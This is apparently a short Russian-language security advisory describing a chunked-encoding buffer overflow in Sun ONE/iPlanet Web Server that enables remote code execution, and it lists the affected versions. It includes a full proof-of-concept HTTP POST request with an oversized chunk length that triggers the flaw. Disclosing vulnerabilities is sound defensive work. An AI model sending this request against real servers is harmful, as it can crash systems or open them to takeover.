Хакер #305. Многошаговые SQL-инъекции
При обработке запросов, кодированных механизмом 'Chunked Encoding', Sun ONE/iPlanet не в состоянии должным образом вычислить необходимые размеры требуемого буфера. Удаленный атакующий может создать уродливую сессию, которая вызовет переполнение буфера. Уязвимость может использоваться для выполнения произвольного кода с системными привилегиями.
Пример:
POST /EEYE.html HTTP/1.1
Host: www.EEYE2002.com
Transfer-Encoding: chunked
Content-Length: 22
4
EEYE
7FFFFFFF
[DATA]
Уязвимость обнаружена в iPlanet E-Commerce Solutions iPlanet Web Server 4.x, iPlanet E-Commerce Solutions iPlanet Web Server 4.1-4.1sp9, iPlanet E-Commerce Solutions iPlanet Web Server 6.0-6.0sp2, Sun ONE Web Server 4.1-6.0.